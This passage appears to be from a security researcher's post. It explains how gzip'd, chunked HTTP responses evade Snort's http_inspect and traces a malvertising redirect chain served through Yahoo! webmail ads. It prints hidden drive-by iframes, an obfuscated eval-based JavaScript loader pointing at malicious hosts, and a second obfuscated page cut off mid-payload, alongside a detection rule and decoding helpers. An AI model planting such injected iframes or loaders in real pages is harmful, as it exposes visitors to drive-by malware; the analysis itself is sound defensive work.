Here we have extracted the dechunked body of this response (still compressed with gzip). Looking at it at this point, there really isn't anything in here our sigs are going to fire on. However, since the http_inspect preprocessor has dechunked the data into this buffer, it compares the signatures against it at this point without gunzipping it. Once the comparison is complete, it is on to the next packet:
0000 1f 8b 08 00 00 00 00 00 00 03 bd 52 cb 4e c4 30 ...........R.N.0
0010 0c bc ef 57 44 b9 04 24 da 74 d9 07 85 4d 7a 44 ...WD..$.t...MzD
0020 82 03 1c e0 07 d2 d6 6d 22 d2 64 37 75 f7 f1 f7 .......m".d7u...
0030 a4 dd 15 42 20 ae f8 64 8f 3d 1e 6b 64 a1 b1 b3 ...B ..d.=.kd...
0040 85 d0 a0 ea 62 26 3a 40 45 34 e2 36 81 dd 60 f6 ....b&:@E4.6..`.
0050 92 56 de 21 38 4c f0 b4 05 4a 2e 95 a4 08 47 e4 .V.!8L...J....G.
0060 23 73 43 2a ad 42 0f 28 9f de 5e 93 3c 5f dd 27 #sC*.B.(..^.<_.'
0070 73 1a 17 a1 41 0b c5 32 5b 92 17 8f e4 d1 0f ae s...A..2[.......
0080 16 fc 0c 0a 3e 89 89 d2 d7 27 52 b6 95 b7 3e 48 ....>....'R...>H
0090 7a d0 06 61 64 56 51 0e 42 bc 68 fe 93 1e 11 c1 z..adVQ.B.h.....
00a0 2f ed 99 d0 71 e6 52 b8 d6 b8 23 cf d2 75 ba 58 /...q.R...#..u.X
00b0 7d 9b e0 a3 42 31 fb ff f8 65 23 0b d0 04 e8 35 }...B1...e#....5
00c0 fb 72 90 dd 6d 86 60 e5 68 f5 03 e7 25 58 6b 2a .r..m.`.h...%Xk*
00d0 df c3 47 9e 1a d7 78 be cb 7b ce 0a d1 57 c1 6c ..G...x..{...W.l
00e0 91 58 e5 da 41 b5 20 e9 b3 da ab b7 09 a4 05 e9 .X..A. .........
00f0 c1 36 69 e7 f7 f0 ee af 16 d9 72 7d b3 c8 56 eb .6i.......r}..V.
0100 eb 0d 11 fc cc 8b 66 9a 26 a8 0e 48 1f 2a c9 fe ......f.&..H.*..
0110 d2 72 b7 96 33 72 30 35 6a c9 e6 8c 68 30 ad c6 .r..3r05j...h0..
0120 29 9d d8 a5 0f 35 04 c9 b2 78 10 3f 2f 8c c9 f4 )....5...x.?/...
0130 36 9f 04 6b bf 18 3d 02 00 00 6..k..=...
However, if we gunzip this extracted data, we get the following, which contains something we are very interested in signaturing: a hidden iframe redirecting the client to a drive-by site:
0000 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 <html><head>.<me
0010 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 ta http-equiv="c
0020 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e ontent-type" con
0030 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b tent="text/html;
0040 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 charset=ISO-885
0050 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 9-1">.<title>404
0060 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c Not Found</titl
0070 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 e></head><body b
0080 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a gcolor="white">.
0090 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 <center><h1>404
00a0 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f Not Found</h1></
00b0 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e center>.<hr><cen
00c0 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 36 2e 33 35 ter>nginx/0.6.35
00d0 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 </center>.</body
00e0 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a >...............
00f0 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0100 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0110 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0120 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0130 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0140 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0150 0a 0a 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 ....<meta http-e
0160 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 quiv='refresh' c
0170 6f 6e 74 65 6e 74 3d 27 37 3b 75 72 6c 3d 68 74 ontent='7;url=ht
0180 74 70 3a 2f 2f 62 65 6c 6c 69 63 6f 73 65 6b 38 tp://bellicosek8
0190 2e 69 6e 66 6f 2f 71 38 73 2f 27 3e 3c 73 63 72 .info/q8s/'><scr
01a0 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 ipt language="Ja
01b0 76 61 53 63 72 69 70 74 22 3e 20 73 65 6c 66 2e vaScript"> self.
01c0 6d 6f 76 65 54 6f 28 33 30 34 36 2c 33 30 35 36 moveTo(3046,3056
01d0 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 69 66 ); </script>.<if
01e0 72 61 6d 65 20 73 72 63 3d 27 68 74 74 70 3a 2f rame src='http:/
01f0 2f 62 65 6c 6c 69 63 6f 73 65 6b 38 2e 69 6e 66 /bellicosek8.inf
0200 6f 2f 6e 32 6c 2f 27 20 77 69 64 74 68 3d 27 31 o/n2l/' width='1
0210 27 20 68 65 69 67 68 74 3d 27 31 27 20 66 72 61 ' height='1' fra
0220 6d 65 62 6f 72 64 65 72 3d 27 30 27 3e 3c 2f 69 meborder='0'></i
0230 66 72 61 6d 65 3e 3c 2f 68 74 6d 6c 3e frame></html>
Or the following in just plain old printable HTML output:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>404 Not Found</title></head><body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
<meta http-equiv='refresh' content='7;url=http://bellicosek8.info/q8s/'><script language="JavaScript"> self.moveTo(3046,3056); </script>
<iframe src='http://bellicosek8.info/n2l/' width='1' height='1' frameborder='0'></iframe></html>
So in testing, we wrote the simplest possible signature, looking for just the string “iframe”, and ran it against the sample PCAP we had. The signature was as follows:
alert tcp any any -> any any (msg:"MALVERTISING hidden iframe served by nginx 2"; content:"iframe"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)
When we look at the console output, we get zero alerts, which should not be the case. Below is the http_inspect output from Snort for the run against this test PCAP. Notice something odd: there are non-zero counts for “HTTP Response Gzip packets extracted” and “Gzip Compressed Data Processed”, but the value for “Gzip Decompressed Data Processed” is “0.00”.
HTTP Inspect - encodings (Note: stream-reassembled packets included):
POST methods: 0
GET methods: 2
HTTP Request Headers extracted: 2
HTTP Request Cookies extracted: 0
Post parameters extracted: 0
HTTP response Headers extracted: 2
HTTP Response Cookies extracted: 0
Unicode: 0
Double unicode: 0
Non-ASCII representable: 0
Base 36: 0
Directory traversals: 0
Extra slashes ("//"): 0
Self-referencing paths ("./"): 0
HTTP Response Gzip packets extracted: 2
Gzip Compressed Data Processed: 331.00
Gzip Decompressed Data Processed: 0.00
Total packets processed: 4
So it appears that Snort’s http_inspect does identify and extract the gzip’d packets, but it does not decompress and inspect the data when it was transferred via chunked encoding. Below is the http_inspect section of the snort.conf used during testing. This should be the same configuration you receive in the snort.conf contained within the VRT ruleset downloaded from Snort.org. Note that it is definitely configured to decompress, dechunk and inspect gzip’d data (compress_depth, decompress_depth, chunk_length and inspect_gzip), and the limits set for each of these are much, much larger than anything we are dealing with in the example PCAP.
preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 20480 decompress_depth 20480
preprocessor http_inspect_server: server default \
chunk_length 500000 \
server_flow_depth 0 \
client_flow_depth 0 \
post_depth 65495 \
oversize_dir_length 500 \
max_header_length 750 \
max_headers 100 \
ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 }\
non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \
enable_cookie \
extended_response_inspection \
inspect_gzip \
apache_whitespace no \
ascii no \
bare_byte no \
directory no \
double_decode no \
iis_backslash no \
iis_delimiter no \
iis_unicode no \
multi_slash no \
non_strict \
u_encode yes \
webroot no
Unfortunately, quite a bit of gzip’d content is transmitted with chunked encoding. Chunked encoding is used when the server does not know the content length of the response in advance; when a webserver compresses data on the fly it generally ends up using this method, since it cannot compute how large the response will be until after it has already started sending it back to the client. Hopefully functionality will be added to remedy the inability to inspect these HTTP responses, because this is currently being leveraged quite frequently in the wild to evade IDS by many different FakeAV, drive-by and malvertising sites.
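To make the evasion concrete, here is an added example (not code from the original post or from Snort) that wraps the decompressed HTML shown above in a gzip’d, chunked HTTP response the way a server compressing on the fly would, and then shows that a plain content match for “iframe” only succeeds after the body has been both de-chunked and decompressed. The response headers and the chunk size are constructed for the example.

```python
"""Added example (not from the original post): de-chunk and gunzip an HTTP
response body, then run the same kind of plain content match the test
signature used.  The response is constructed here; its HTML body is the
decompressed page shown in the post (minus the run of blank lines)."""
import gzip
import re

SAMPLE_HTML = (
    b"<html><head>\n"
    b"<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-8859-1\">\n"
    b"<title>404 Not Found</title></head><body bgcolor=\"white\">\n"
    b"<center><h1>404 Not Found</h1></center>\n"
    b"<hr><center>nginx/0.6.35</center>\n"
    b"</body>\n"
    b"<meta http-equiv='refresh' content='7;url=http://bellicosek8.info/q8s/'>"
    b"<script language=\"JavaScript\"> self.moveTo(3046,3056); </script>\n"
    b"<iframe src='http://bellicosek8.info/n2l/' width='1' height='1' frameborder='0'></iframe></html>"
)

def build_chunked_gzip_response(html: bytes, chunk_size: int = 100) -> bytes:
    """Constructed response: no Content-Length, Transfer-Encoding: chunked,
    Content-Encoding: gzip, which is what on-the-fly compression produces."""
    payload = gzip.compress(html)
    chunks = [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]
    body = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in chunks) + b"0\r\n\r\n"
    headers = (b"HTTP/1.1 404 Not Found\r\n"
               b"Server: nginx/0.6.35\r\n"
               b"Content-Type: text/html\r\n"
               b"Transfer-Encoding: chunked\r\n"
               b"Content-Encoding: gzip\r\n"
               b"Connection: close\r\n\r\n")
    return headers + body

def parse_headers(raw: bytes):
    """Split a raw response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower()] = v.strip()
    return lines[0], headers, body

def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (hex size, CRLF, data, CRLF,
    terminated by a zero-size chunk)."""
    out = b""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size_field = body[pos:line_end].split(b";")[0]  # drop chunk extensions
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data
    return out

def decode_response_body(raw: bytes) -> bytes:
    """Undo the transfer encoding first, then the content encoding.  An
    inspector that applies only one of the two still sees compressed bytes."""
    _, headers, body = parse_headers(raw)
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        body = dechunk(body)
    if headers.get(b"content-encoding", b"").lower() == b"gzip":
        body = gzip.decompress(body)
    return body

# A slightly tighter check than the test signature: an iframe sized 0 or 1 px.
HIDDEN_IFRAME = re.compile(rb"<iframe[^>]*\b(?:width|height)=['\"]?[01]\b", re.IGNORECASE)

def inspect(raw: bytes) -> dict:
    """Compare what a no-decoding match and a fully decoded match each see."""
    _, _, undecoded = parse_headers(raw)
    decoded = decode_response_body(raw)
    return {
        "raw_has_iframe": b"iframe" in undecoded.lower(),
        "decoded_has_iframe": b"iframe" in decoded.lower(),
        "hidden_iframe": HIDDEN_IFRAME.search(decoded) is not None,
    }

if __name__ == "__main__":
    print(inspect(build_chunked_gzip_response(SAMPLE_HTML)))
```

The order of the two decoding steps matters: chunking is applied last by the server, so it has to be removed first; gunzipping the still-chunked bytes fails on the chunk-size line.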
Below we have a user who has done something millions upon millions of people do every day: log in to their Yahoo! webmail. However, this time Yahoo! is going to let someone it has a business relationship with attempt to exploit the user and deliver malicious software to their computer. Upon visiting the site, Yahoo! causes the client to make the following request to a malvertising server (c3metrics.net). Note that the Referer in the request below is a web service that routes the client to the advertisement displayed to clients logging in to the Yahoo! webmail service; if you visit it directly and read the JavaScript comments you can confirm this:
GET /jsc/fm.js?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
The response to this request is an HTTP 301 status code that redirects from the above URI to the one below; they are nearly identical except for a single forward slash between fm.js and ?n:
HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Content-Length: 185
Location: http://c3metrics.net/jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z=
Connection: keep-alive
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.45</center>
</body>
</html>
Now the user is following the redirected URI it received:
Request:
GET /jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
However, this time the malvertising server serves the client some JavaScript that is obfuscated in order to escape detection or analysis by various network-based security tools (IDS, IPS, etc.):
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3572
var _MlgYp=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var RUOR=this;var JXzn_=RUOR [_MlgYp];var CVXMF_s=new String('unescape');var uhbnP=RUOR [CVXMF_s];var IBpC='PrMPdkPd=PJOPd=PJ/PJkPd=PJgPJsParPkgParPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/ParPagParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPdkPdiPJaPdkPd=PdaPJ/PJqPJdPa2PkrPasParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPJsPJOPdkPd=P=/PJqPJ=PJiPd2P=3PJJPa2PaaParPaaPa/PagPkOPa/Pa/Pa/ParPa3ParPa2PkOPkrPkrPkrParPaMParPkJPkrParPaMParPkJPkrPa/PkmPrMPrMPdJPJOPdaParPJOPJsPJsPi3Pd=ParPkgParPaaPkOPasPkaPasPkkPasPk=PasPkiPasPkJPasPkdPasPk2PasPk/PaaPkmPrMPdJPJOPdaParPJgPd=PJkPJ2ParPkgParPJOPJsPJsPi3Pd=PaqPJgPJOPd=PJkPJ2Pa2PdkPd=PJOPd=PJ/PJkPd=PJgPJsPa/PkmPrMPrMPrMPrMPJ/PJJParPa2ParPJgPd=PJkPJ2ParPaOPkgParPJqPdiPJsPJsParPa/ParPdmPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3Pd=PaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PaJPdkPkgPkrPaJPJiPkgPkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkrPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkrPadParParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPdgParParPJiPJsPdkPJiParParPdmPrMPrMPr/Pr/PrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PddPJ/PJsPdkPd=PJ3PdkPJiPaqPJkPJ3PaqPJkPJkPa3PdMPJgPd=PdaP
JkPaqPdrPJ2PdrPk3PdrPdOPkgPJkPdiPdkPd=PkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmParPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3PJMPdkPi3PJiPaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrMPdgPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJOParPJ2PdaPJiPJJPkgPadPJ2Pd=Pd=PdrPaiPkkP=OPaiPkaP=JPaiPkaP=JPd=PdaPJOPJkPJmPJ/PJqPJdPaqPJkPJ3PJgPadParPd=PJOPdaPJdPJiPd=PkgPadPi3PJaPJsPJOPJqPJmPadPaiPkkP=iPaiPkkP=kPJ/PJgPJdParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PJaPJ=PJaPa3PdrPJ/Pd2PJiPJsPaqPJdPJ/PJJPadParPJaPJ3PdaPJ=PJiPdaPkgPadPkrPadParPaiPkkP=iPaiPkkP=kPa3PJOPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrM';var jlgkds='C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5';var GaJhym='s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&HWU7cyR1PC_bqN8Zp3i';var _jNcLS='';var TOZI;var DdC;for(TOZI=0;TOZI<IBpC.length;TOZI++){ DdC=GaJhym.indexOf(IBpC.charAt(TOZI));if(DdC>-1){ _jNcLS+=jlgkds.charAt(DdC);}}JXzn_(uhbnP(_jNcLS));
Now this JavaScript just looks like a lot of junk, but it is pretty easy to deobfuscate using tools like the Firefox Firebug extension or great online tools like JSUnpack. We submitted the above JavaScript to JSUnpack and the report can be viewed here:
http://jsunpack.jeek.org/dec/go?report=7bff4237dbcb5448c08c5c3b40f4c1d0a97c889b
The output we are concerned with in this report is right here; this is what ends up being written into the HTML document. Please do not go to the URLs below unless you are performing research within your sandboxes or on sacrificial lambs:
<iframe src='http://wilstose.co.cc/zmtrc.php?pq=cust1' style='visibility:hidden;' width='1' height='1'></iframe>
<iframe src='http://c3metrics.net/stats_js_e.php?id=<REMOVED>' style='visibility:hidden;' width='1' height='1'></iframe>
<a href='http://tracking.com' target='_blank'><img src='http://c3metrics.net/bdb/pixel.gif' border='0'></a>
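The script above is a simple substitution cipher: each character of the big string is looked up in one alphabet and replaced by the character at the same position in the other, the result is passed through unescape(), and the text is handed to eval. Here is an added example (not code from the original post or from JSUnpack) that reimplements that loop in Python, with eval replaced by returning the decoded text so it can be read rather than run. The two alphabets and the short ciphertext prefix are copied from the script as printed above; the round-trip plaintext and the encoder are constructed for testing.

```python
"""Added example (not from the original post): Python reimplementation of the
decoding loop in the c3metrics.net script, returning the text that eval()
would have received instead of executing it."""

# Alphabets copied from the script.  Each IBpC character is looked up in
# GaJhym and replaced by the character at the same index in jlgkds.
JLGKDS = "C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5"
GAJHYM = "s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&HWU7cyR1PC_bqN8Zp3i"
assert len(JLGKDS) == len(GAJHYM) == len(set(GAJHYM))  # a true permutation

DECODE_MAP = {c: p for c, p in zip(GAJHYM, JLGKDS)}
ENCODE_MAP = {p: c for c, p in DECODE_MAP.items()}

def js_unescape(s: str) -> str:
    """Minimal JavaScript unescape(): %uXXXX and %XX sequences are decoded,
    anything else is passed through unchanged."""
    out = []
    i = 0
    while i < len(s):
        if s[i] == "%" and s[i + 1:i + 2] == "u" and len(s) >= i + 6:
            try:
                out.append(chr(int(s[i + 2:i + 6], 16)))
                i += 6
                continue
            except ValueError:
                pass
        if s[i] == "%" and len(s) >= i + 3:
            try:
                out.append(chr(int(s[i + 1:i + 3], 16)))
                i += 3
                continue
            except ValueError:
                pass
        out.append(s[i])
        i += 1
    return "".join(out)

def substitute(cipher: str) -> str:
    """The for-loop from the script: characters not found in GaJhym are dropped
    (indexOf() returns -1 and the script skips them)."""
    return "".join(DECODE_MAP[c] for c in cipher if c in DECODE_MAP)

def deobfuscate(cipher: str) -> str:
    """Everything the script does before eval(), returned as text."""
    return js_unescape(substitute(cipher))

def js_escape(s: str) -> str:
    """Inverse of js_unescape for the round-trip test: ASCII alphanumerics
    are kept, everything else becomes %XX or %uXXXX."""
    return "".join(
        ch if ch.isalnum() and ch.isascii()
        else ("%%%02X" % ord(ch) if ord(ch) < 256 else "%%u%04X" % ord(ch))
        for ch in s)

def obfuscate(plain: str) -> str:
    """Constructed encoder (the kit's server side is not on the page)."""
    return "".join(ENCODE_MAP[c] for c in js_escape(plain))

# The first 21 characters of the IBpC string printed in the post.
IBPC_PREFIX = "PrMPdkPd=PJOPd=PJ/PJk"

if __name__ == "__main__":
    print(repr(deobfuscate(IBPC_PREFIX)))
```

Walking the prefix by hand shows the mechanism: every “P” maps to “%”, so the ciphertext is a percent-encoded string in disguise, and the first seven decoded characters are a newline followed by “static”.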
Now, at this point the client will perform requests to the URIs in the two IFRAMEs along with the gif. First we will look at the request to the stats_js_e.php file, which is used purely for tracking purposes. The id= variable passed to it is a simple UNIX timestamp. We have removed it from our examples here (but it is obviously still available in the JSUnpack report if you care to see it).
GET /stats_js_e.php?id=<REMOVED> HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
As you can see, the response to this contains nothing, as it is just for statistics and tracking purposes:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 0
Next we will look at the request to the wilstose.co.cc host. This is a request to an intermediary system that produces a redirect to the actual drive-by site:
GET /zmtrc.php?pq=cust1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: wilstose.co.cc
Connection: Keep-Alive
The response includes the actual link to the live drive-by site, contained within a hidden IFRAME:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 133
<html>
<body>
<iframe src="http://bbcxq.com/ar/putyq.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
This now causes the client to perform a request against the bbcxq.com site:
GET /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://wilstose.co.cc/zmtrc.php?pq=cust1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
The response to this request again serves up obfuscated data that has to be deobfuscated using the script referenced in the response (in this case it is named rnrt.js):
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1615
Content-Type: text/html
Date: Mon, 02 Aug 2010 <REMOVED>
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14
<html>
<head>
<script src="rnrt.js"></script>
</head>
<body uskbfxyp onload="OUWD();" nbl>(EG)(NB)(X_)
<input type="hidden" id="tm" value="4">(YU)(DJ)(KJ)
<input type="hidden" id="GVaV" value="12#c63@f#b9773@0~2#68@8@94b60~64d3@618@98@db5a!768@ecebf#de7c743@f#73@417496e91114f#65c2#52#b52#df#d5c46656ddc8@16bb8@d641e2#a!98@65cda!e713@8@f#3@12#50~177b8@7f#a!b7a!f#cf#dd7d0~143@a!8@4158@b78@42#8@a!f#2#461f#72#4944db66e1f#158@8@ca!8@3@f#9592#5f#8@d42#47e67a!c0~2#e6da!a!7d650~6477b8@a!0~cf#76a!3@3@0~740~c657def#3@143@e42#cc61447d7f#9e55c47c4b4a!c6ba!5795a!2#78@3@48@7f#5560~2#3@111beec2#3@68@416c4cb0~3@a!498@2#b73@c53@13@0~df#a!52#8@ce50~8@6b6e6cd55d18@710~f#2#9de2#69cc7a!3@b2#7f#d3@973@518@6c4c1e17ca!3@548@68@eb18@8@b2#2#14f#b3@0~94a!457493@1918@9b0~9c1b7eb8@b9cb7490~8@748@9d7748@5563@1ef#3@2#f#58@b5c11c7be0~0~e99d174bf#59574ba!92#72#bc3@655de5f#d54c12#b3@5969db0~f#cb4bb63@8@3@5198@a!c78@40~2#452#41f#d518@4650~75f#f#e3@f#f#65760~b42#3@55466e613@2#dbe5c2#1f#54f#cdf#bcc7c10~d595db8@68@8@953@3@0~0~613@cbf#9c3@e0~7dc190~6df#8@f#3@0~ca!ea!cf#0~9bcb0~40~48@c8@78@8@cb0~8@2#2#be7678@61950~da!75f#3@a!8@4e10~7dd15cce8@d58@eb0~c6a!77448@63@f#b7b5c1f#8@43@8@8@98@8@f#8@40~3@3@2#6f#cb1169112#4e13@d42#d963@0~d13@40~8@3@e6e7a!3@3@98@46d0~5c1998@60~62#55148@b196652#10~3@1540~b2#60~8@a!1a!c1c9ea!b